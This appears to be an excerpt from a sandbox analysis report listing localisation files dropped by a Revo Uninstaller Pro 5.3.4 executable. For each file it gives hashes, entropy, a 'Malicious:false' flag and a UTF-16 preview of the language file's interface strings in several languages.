                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.C.z.e.c.h.....W.e.b.L.a.n.g.=.c.z.....T.r.a.n.s.l.a.t.o.r.=.T.Y.a.s...k. .J.i.Y.......C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...2...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .Z.o.b.r.a.z.i.t.....1.0.3. .=. .N.a.s.t.a.v.e.n.......1.0.4. .=. .O.d.i.n.s.t.a.l...t.o.r.....1.0.5. .=. .N...s.t.r.o.j.e.....1.0.6. .=. .R.e.~.i.m. .l.o.v.c.e.....1.0.7. .=. .S.e.z.n.a.m.....1.0.8. .=. .I.k.o.n.y.....1.0.9. .=. .D.e.t.a.i.l.y.....1.1.0. .=. .O.d.i.n.s.t.a.l.o.v.a.t.....1.1.1. .=. .O.d.e.b.r.a.t. .p.o.l.o.~.k.u.....1.1.2. .=. .O.b.n.o.v.i.t.....1.1.3. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.e.b.r.a.t. .v.y.b.r.a.n.o.u. .p.o.l.o.~.k.u.?.....1.1.4. .=. .O.p.r.a.v.d.u. .c.h.c.e.t.e. .o.d.i.n.s.t.a.l.o.v.a.t. .v.y.b.r.a.n... .p.r.o.g.r.a.m.?.....1.1.5. .=. .A.u.t.o.a.k.t.u.a.l.i.z.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):97176
                                                                                                                                            Entropy (8bit):3.499969901388738
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:woFhvFocuFdycapmrOS9osFVrbmlEAicBDPGy0fr:hvFoc6dycaptSW0VrqlEAicBD+y+
                                                                                                                                            MD5:2B6C3675752D595B68E3E1C0A5992435
                                                                                                                                            SHA1:790F9E5297743509F2F5ACB575886935BB768EF4
                                                                                                                                            SHA-256:FA6449751FB82B79A1E4F071E5C20CF0DE86D015EDA9F0ABA347937A7F1394A2
                                                                                                                                            SHA-512:7F5DE4C53D39E69CBD69F27211BCA76FF7ADEB52BFFB4662136ACE6291B792D417FC9C4DEA67C1BD807788D03E427151B912E1A380D770FDEC50451D770D6BBE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .D.a.n.s.k./.D.a.n.i.s.h.....W.e.b.L.a.n.g.=.D.A.N.....T.r.a.n.s.l.a.t.o.r.=.R.e.g.m.o.s.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...5...5.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.....1.0.3. .=. .I.n.d.s.t.i.l.l.i.n.g.e.r.....1.0.4. .=. .A.f.i.n.s.t.a.l.l.e.r.i.n.g.....1.0.5. .=. .V...r.k.t...j.....1.0.6. .=. .J.a.g.t.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.f.i.n.s.t.a.l.l...r.....1.1.1. .=. .F.j.e.r.n. .e.m.n.e.....1.1.2. .=. .O.p.d.a.t...r.....1.1.3. .=. .V.i.l. .d.u. .f.j.e.r.n.e. .d.e.t. .v.a.l.g.t.e. .e.m.n.e.?.....1.1.4. .=. .V.i.l. .d.u. .a.f.i.n.s.t.a.l.l.e.r.e. .d.e.t. .v.a.l.g.t.e. .p.r.o.g.r.a.m.?.....1.1.5. .=. .O.p.d.a.t.e.r.i.n.g.....1.1.6. .=. .H.j...l.p.....1.1.7. .=. .H.j...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (788), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):136212
                                                                                                                                            Entropy (8bit):3.4484649128879137
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:YusdiMXLgWkkKnB9jGm9ROVjB5ZegxC9WFh88ff0hUWaFZDeleeDK/4I4E4L03hA:mIyXxG
                                                                                                                                            MD5:170AF0E2F66875D305D9A1B5C054869B
                                                                                                                                            SHA1:AEB176BE7A44F890269EE45E79D5999138CD3EC6
                                                                                                                                            SHA-256:78386718921BC10E739CD96216F97C5F41308302A7F299B59AD76CABD8523E82
                                                                                                                                            SHA-512:9FBE996119EDA876C7613F759CF2BE7C86F02A9D7F382AF3F51F4CECE696C898620DFC6E9540C3541532AB0C9AC82B01297DFE1CD428E2F3AE667F0C9A7C9E59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .N.e.d.e.r.l.a.n.d.s./.D.u.t.c.h.....W.e.b.L.a.n.g.=.N.L.....T.r.a.n.s.l.a.t.o.r.=.J.a.n. .V.e.r.h.e.i.j.e.n.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .B.e.e.l.d.....1.0.3. .=. .O.p.t.i.e.s.....1.0.4. .=. .D.e.-.i.n.s.t.a.l.l.a.t.i.e.....1.0.5. .=. .H.u.l.p.p.r.o.g.r.a.m.m.a.'.s.....1.0.6. .=. .J.a.c.h.t.m.o.d.u.s.....1.0.7. .=. .L.i.j.s.t.....1.0.8. .=. .P.i.c.t.o.g.r.a.m.m.e.n.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .D.e.-.i.n.s.t.a.l.l.e.r.e.n.....1.1.1. .=. .I.t.e.m. .v.e.r.w.i.j.d.e.r.e.n.....1.1.2. .=. .V.e.r.n.i.e.u.w.e.n.....1.1.3. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .d.i.t. .w.i.l.t. .v.e.r.w.i.j.d.e.r.e.n.?.....1.1.4. .=. .W.e.e.t. .u. .z.e.k.e.r. .d.a.t. .u. .h.e.t. .g.e.s.e.l.e.c.t.e.e.r.d.e. .p.r.o.g.r.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (667), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126456
                                                                                                                                            Entropy (8bit):3.469932961281367
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2G/KyyIrUp+ihmoqVl4hF7bPwlBB9YK3zZ1lvQ:2GiybrVCmoqVlcFvyB0Kji
                                                                                                                                            MD5:17CBDCF3F67B750D9E2CFB18DA7999E7
                                                                                                                                            SHA1:493D989BEBAED68D57FDF72660E3664EA42FD669
                                                                                                                                            SHA-256:5663AF4869A89B1576748A914B63DB89A79FF8374A920D288445E2D600449DCD
                                                                                                                                            SHA-512:2407C09A6997C15FAAD8E49C8332504F6100EF0470192235E08DC3E7D525984E5D96D2A595C846CE2A43885BDB680E2DD84D42A0F086902C5BF1216A3CCBD202
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.n.g.l.i.s.h.....W.e.b.L.a.n.g.=.E.N.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.e.w.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .U.n.i.n.s.t.a.l.l.e.r.....1.0.5. .=. .T.o.o.l.s.....1.0.6. .=. .H.u.n.t.e.r. .M.o.d.e.....1.0.7. .=. .L.i.s.t.....1.0.8. .=. .I.c.o.n.s.....1.0.9. .=. .D.e.t.a.i.l.s.....1.1.0. .=. .U.n.i.n.s.t.a.l.l.....1.1.1. .=. .R.e.m.o.v.e. .E.n.t.r.y.....1.1.2. .=. .R.e.f.r.e.s.h.....1.1.3. .=. .A.r.e. .y.o.u. .s.u.r.e. .t.h.a.t. .y.o.u. .w.a.n.t. .t.o. .r.e.m.o.v.e. .t.h.e. .s.e.l.e.c.t.e.d. .e.n.t.r.y.?.....1.1.4. .=. .A.r.e. .y.o.u. .s.u.r.e. .y.o.u. .w.a.n.t. .t.o. .u.n.i.n.s.t.a.l.l. .t.h.e. .s.e.l.e.c.t.e.d. .p.r.o.g.r.a.m.?.....1.1.5.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (552), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):102574
                                                                                                                                            Entropy (8bit):3.4292555280223818
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:3BS3SpCVzylFGnh/QI2WCUHgG+d5d3cKE:3BS3SpCxuFGnh/uWCSgG+d5de
                                                                                                                                            MD5:A71E4B0F3A6135AEF662509B9745A3B9
                                                                                                                                            SHA1:B0199874CE7B88C391A17B27BBC44F5683B9DC8E
                                                                                                                                            SHA-256:A025E5A628208C16EA79694DD99AE311674BA66039E6D09E25F9E07972D0F055
                                                                                                                                            SHA-512:B542383514A9E341DFD2DAF4C8107D49CA98AFBB3D7BB81E9DCF03185BFE5C9935FCF9EEC90ED979C6DF734A60899BC249F2E1B7491A5966A3FB60DDC4EA3393
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.S.u.o.m.i./.F.i.n.n.i.s.h.....W.e.b.L.a.n.g.=.F.I.N.....T.r.a.n.s.l.a.t.o.r.=.O.l.l.i. .(.o.l.l.i.n.p.o.s.t.i.t.@.g.m.a.i.l...c.o.m.).....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .N...y.t.......1.0.3. .=. .A.s.e.t.u.k.s.e.t.....1.0.4. .=. .S.o.v.e.l.l.u.s.t.e.n. .p.o.i.s.t.o.....1.0.5. .=. .T.y...k.a.l.u.t.....1.0.6. .=. .O.s.o.i.t.u.s.t.o.i.m.i.n.t.o.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .K.u.v.a.k.k.e.e.t.....1.0.9. .=. .T.i.e.d.o.t.....1.1.0. .=. .P.o.i.s.t.a. .s.o.v.e.l.l.u.s.....1.1.1. .=. .P.o.i.s.t.a. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.t.......1.1.2. .=. .P...i.v.i.t... .l.u.e.t.t.e.l.o.....1.1.3. .=. .O.l.e.t.k.o. .v.a.r.m.a.,. .e.t.t... .h.a.l.u.a.t. .p.o.i.s.t.a.a. .v.a.l.i.t.u.n. .r.e.k.i.s.t.e.r.i.m.e.r.k.i.n.n.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (642), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):152860
                                                                                                                                            Entropy (8bit):3.44749248104316
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:joijwidVJir5Wz8dm4V2s7EaYRbuSzNDCnPzA4Ke515hQFbtjkw9TSePDYNBU31L:2gLirEz8dmQ7EaYRTgnPm7Z
                                                                                                                                            MD5:3231DDD2F82B85DB1CD869787928DD93
                                                                                                                                            SHA1:AA17C84A1228555DC351571FB85E442F92C27478
                                                                                                                                            SHA-256:3873A122E6E00D421913C8C85D2112C85DFBB28ABB408CB44D6DC9B56CC74CB8
                                                                                                                                            SHA-512:4C477FAEA63D96ABF792338070CC753EA5FBBA21E23DEEE496E085D6F5478672EA3A38B7B6286303BE3D28234CF3F94BEAB9A64918A658365DE2626E861DB43B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .F.r.a.n...a.i.s./.F.r.e.n.c.h.....W.e.b.L.a.n.g.=.F.R.A.....T.r.a.n.s.l.a.t.o.r.=...m.i.l.e. .M.o.r.v.a.n.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.f.f.i.c.h.a.g.e.....1.0.3. .=. .O.p.t.i.o.n.s.....1.0.4. .=. .D...s.i.n.s.t.a.l.l.e.u.r.....1.0.5. .=. .A.u.t.r.e.s. .o.u.t.i.l.s.....1.0.6. .=. .M.o.d.e. .t.r.a.q.u.e.u.r.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .I.c...n.e.s.....1.0.9. .=. .D...t.a.i.l.l... .....1.1.0. .=. .D...s.i.n.s.t.a.l.l.e.r.....1.1.1. .=. .S.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e.....1.1.2. .=. .R.a.f.r.a...c.h.i.r.....1.1.3. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .s.u.p.p.r.i.m.e.r. .l.'.e.n.t.r...e. .s...l.e.c.t.i.o.n.n...e. .?.....1.1.4. .=. .V.o.u.l.e.z.-.v.o.u.s. .v.r.a.i.m.e.n.t. .d...s.i.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):150688
                                                                                                                                            Entropy (8bit):3.487331298408884
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:NzGb5p5B0vDcOQywq61+EgpHuOmZ1of41S7aDB5ag+Jkb3bQkzMjPjXg8iM3qQoU:yT0
                                                                                                                                            MD5:C333FD6BEDC812B8492B9068E3DFA7B5
                                                                                                                                            SHA1:322DDA605843896F8EA76997EC6274E44BF2C9F5
                                                                                                                                            SHA-256:6443FDA6F0A0FB4F99329962A1B09CAF3BF8568C74FC9D6EEBA1302A0C29300E
                                                                                                                                            SHA-512:7159FF7743DA3B3B62098FC2370E4AFD26980214EBD34C76F515BA553632DD5025B78C3389E53D064710C64A1B1BB2987055EFBC8C8256F10478F22BC375A15E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.D.e.u.t.s.c.h./.G.e.r.m.a.n.....W.e.b.L.a.n.g.=.G.E.R.....T.r.a.n.s.l.a.t.o.r.=.D.i.r.k. .P.a.u.l.s.e.n. ." .A.n.d.y. .K.l.e.i.n.e.r.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .A.n.s.i.c.h.t.....1.0.3. .=. .E.i.n.s.t.e.l.l.u.n.g.e.n. .(.A.l.t. ..' .O.).....1.0.4. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.0.5. .=. .E.x.t.r.a.s.....1.0.6. .=. .J.a.g.d.m.o.d.u.s.....1.0.7. .=. .L.i.s.t.e.n.a.n.s.i.c.h.t.....1.0.8. .=. .S.y.m.b.o.l.a.n.s.i.c.h.t.....1.0.9. .=. .D.e.t.a.i.l.a.n.s.i.c.h.t.....1.1.0. .=. .D.e.i.n.s.t.a.l.l.i.e.r.e.n.....1.1.1. .=. .E.l.e.m.e.n.t. .l...s.c.h.e.n.....1.1.2. .=. .A.k.t.u.a.l.i.s.i.e.r.e.n. .(.S.t.r.g. ..' .R.).....1.1.3. .=. .M...c.h.t.e.n. .S.i.e. .d.a.s. .a.u.s.g.e.w...h.l.t.e. .E.l.e.m.e.n.t.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (763), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131466
                                                                                                                                            Entropy (8bit):4.065690087759101
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:rUVdwiSTdrABIXzfGCR3ZIaqF9/Yfzbu/TysGGaqZQ/NOjYF1aCiLGH:rUVdwiSTdrABIXzfGCR3ZIaqn/YfzbuC
                                                                                                                                            MD5:9A0D1063F791A4803AFB207E145FB7F5
                                                                                                                                            SHA1:4684E675834CB94ABD0A5AA4C7DEFABCF5B8CB9A
                                                                                                                                            SHA-256:0561BBFFC5347477DE4F28FB6C76F0DFEE254656125201DE0268392FBCE24368
                                                                                                                                            SHA-512:D662103D2716357942AD16C1386CA44D9E3BFEB289A6A4E2B8B586E851C29395A623BDE0AC35F090D04B7FE12632D68D427E2D6038CFE4D78DC321A09476E31E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .............../.G.u.j.a.r.a.t.i.....W.e.b.L.a.n.g.=.G.U.J.....T.r.a.n.s.l.a.t.o.r.=.K.u.m.a.r.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...........1.0.3. .=. ...................1.0.4. .=. ...........................1.0.5. .=. ...............1.0.6. .=. ............. ...........1.0.7. .=. .............1.0.8. .=. ...................1.0.9. .=. ...............1.1.0. .=. ..................... ...........1.1.1. .=. ............... ....... ...........1.1.2. .=. ............... ...........1.1.3. .=. ....... ....... ........... ......... ........... ................... ....... ......... ........... .....?.....1.1.4. .=. ....... ....... ........... ......... ........... ....................... ..................... .........
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):93828
                                                                                                                                            Entropy (8bit):4.066173134482651
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:H3oaEv+m7B5TZ5PNQzeoh2TwMRwBCDwUnMM8yArA4ad:Xoacmzhh2TwMRwADwUnn80d
                                                                                                                                            MD5:06007D50FFCC9ADCEFF96CF4439D033A
                                                                                                                                            SHA1:9C36E3C895694F30D1632B1EC0D571F5D8A2F2F9
                                                                                                                                            SHA-256:4C301B86818CA1D9134A8E416D347FF50EFF071E8377F69EB838FB42FF0ABAB3
                                                                                                                                            SHA-512:68B40EA6FE2FF9527D62E03B9A88583B2E4AE38F8FDC4016071CB47ED7CE2DB87411BD114566E840B946600123CC251C12C0C023528DBBAEFE4DFF26443860A6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.........../.H.e.b.r.e.w.....W.e.b.L.a.n.g.=.H.E.B.....T.r.a.n.s.l.a.t.o.r.=.Y.a.r.o.n...S. .-. .Y.a.r.o.n.'.S. .T.e.a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...2...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .....................1.0.4. .=. ......... ...................1.0.5. .=. .............1.0.6. .=. ."....... .".............1.0.7. .=. ...............1.0.8. .=. .....................1.0.9. .=. ...............1.1.0. .=. ...........1.1.1. .=. ....... ...........1.1.2. .=. .............1.1.3. .=.?. ....... ...../... ........./... ............... ........... ..... ......... ...............1.1.4. .=.?. ....... ...../... ........./... ............... ........... ..... ............. .................1.1.5. .=........... ...................1.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (789), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137504
                                                                                                                                            Entropy (8bit):4.127665630312148
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:nH5z/5zzxtz9IraMTSvkNgcM1o2VTHbv5frC:H5XcmC
                                                                                                                                            MD5:323B3488D5BF1B952B83DC562E0A3FA2
                                                                                                                                            SHA1:8DB1AE77803019DB4503B878537C77DCA46391A4
                                                                                                                                            SHA-256:B798D3535F10CCCA8507D9FA0BB891470A8D8D5364013EAAF05D0224BC2247E8
                                                                                                                                            SHA-512:A66EDA53342213C7D475A0569B52CA8DF8C67949C75D6EA1CAA63420D5A1DBE4BBD2818F782257356DA474E2DF558AF8DE37BA9B2614EA831910855631ABB3CE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=................./.G.r.e.e.k.(.H.e.l.l.e.n.i.c.).....W.e.b.L.a.n.g.=.G.R.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...1...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...................1.0.3. .=. .....................1.0.4. .=. .................................1.0.5. .=. .....................1.0.6. .=. ..................... .........................1.0.7. .=. .......................1.0.8. .=. .......................1.0.9. .=. .............................1.1.0. .=. ...............................1.1.1. .=. ................. ...........................1.1.2. .=. .....................1.1.3. .=. ........... ............... ....... ............. ..... ..................... ....... ..................... .................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (754), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):130882
                                                                                                                                            Entropy (8bit):4.087011727696048
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:UY/rr+qMUWBBZ/a/kHLM6/CgK8czSTMy/7:F/P+DUWx/06czSd/7
                                                                                                                                            MD5:271D39E6FF688E684A970F677FFA00B9
                                                                                                                                            SHA1:5A2415E31E5A7E4A5781603FF844406D48AE646A
                                                                                                                                            SHA-256:0B1BF07D976B9E20E2C97EE9D0C959842F885619F0282A5CAEBB882DF0075D47
                                                                                                                                            SHA-512:237D8C27172694F43678C79F211F11769C770E6FDE1FF9F239692B9F93FD78AF53F8D65109CCFBB111C32DA598DA67B94C78962D1A2C0A647F20B45459DAA46A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.9.?.(.M.&.@./.H.i.n.d.i.....W.e.b.L.a.n.g.=.H.I.N.....T.r.a.n.s.l.a.t.o.r.=.J...K.i.s.h.o.r.e. .R.e.d.d.y.,. .a.s.h.i.s.h. .s.h.a.r.m.a.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].........1.0.2. .=. .&.G...G.......1.0.3. .=. .5.?...2.M.*.....1.0.4. .=. ...(.....8.M...>.2.0.....1.0.5. .=. ...*...0.#.....1.0.6. .=. .9.....0. ...K.!.....1.0.7. .=. .8.B...@.....1.0.8. .=. .*.M.0.$.@.......1.0.9. .=. .5.?.5.0.#.....1.1.0. .=. .8.M.%.>.*.(.>. .0.&.M.&. ...0.G.......1.1.1. .=. .*.M.0.5.?.7.M...?. ...K. .9...>.(.G.....1.1.2. .=. .$.>...<.>. ...0.G.....1.1.3. .=. ...M./.>. ...*. .../.(.?.$. .*.M.0.5.?.7.M...?. ...K. .9...>.(.>. ...>.9.$.G. .9.H...?.....1.1.4. .=. ...M./.>. ...*. .../.(.?.$. .*.M.0.K...M.0.>... ...@. .8.M.%.>.*.(.>. .0.&.M.&.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (600), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):93810
                                                                                                                                            Entropy (8bit):3.5478965253929156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loeLuV/aGAVazqJfWUEOINf9Fp2EitEEdQnv6cEeSvi2dIn1VponVP3rMDv:wVcXJfWUCFFpcxEv9Wvi2WDpua
                                                                                                                                            MD5:7D31DBE80F1759C28FFA258946FEC92F
                                                                                                                                            SHA1:A010F11A8C3A495F126F4C9FDB7317ABB1986A17
                                                                                                                                            SHA-256:9F69A409CADA6A835370E3A457EE83470F895B60755EE0807F27276C5738FD35
                                                                                                                                            SHA-512:542D1D5CBAA93BF9368B653D9D56E69860EAA698C33293223BFBFD474EECA7E1482D7E795DFBFB407D670913F87DB3E0A87351970CC0A0DB76DAB43CAC1199B9
                                                                                                                                            Malicious:false
